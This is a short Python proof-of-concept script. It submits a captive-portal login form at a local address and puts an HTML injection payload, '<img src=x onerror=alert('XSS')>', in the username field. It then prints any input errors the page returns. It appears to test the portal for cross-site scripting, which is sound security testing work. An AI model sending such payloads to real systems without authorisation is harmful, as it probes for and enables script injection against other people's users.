#!/usr/bin/env python3
import requests
requests.packages.urllib3.disable_warnings()
from bs4 import BeautifulSoup

baseurl  = 'http://192.168.1.1:8002'
portal_zone = 'testzone'

target = baseurl + '/index.php'

login_data = {
    'zone'         : portal_zone,
    'accept'       : 'Login',
    'auth_user'    : '<img src=x onerror=alert(\'XSS\')>',
}

headers = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0'}

with requests.Session() as s:
    # Login
    r = s.post(baseurl, data=login_data, headers=headers)

    # Dump input errors from response
    soup = BeautifulSoup(r.text, 'lxml')
    input_errors = [errors.text for errors in soup.select('div.input-errors ul li')]
    if (input_errors):
        print("Input errors:\n")
        for ie in input_errors:
            print("* " + ie + "\n")

print('Done')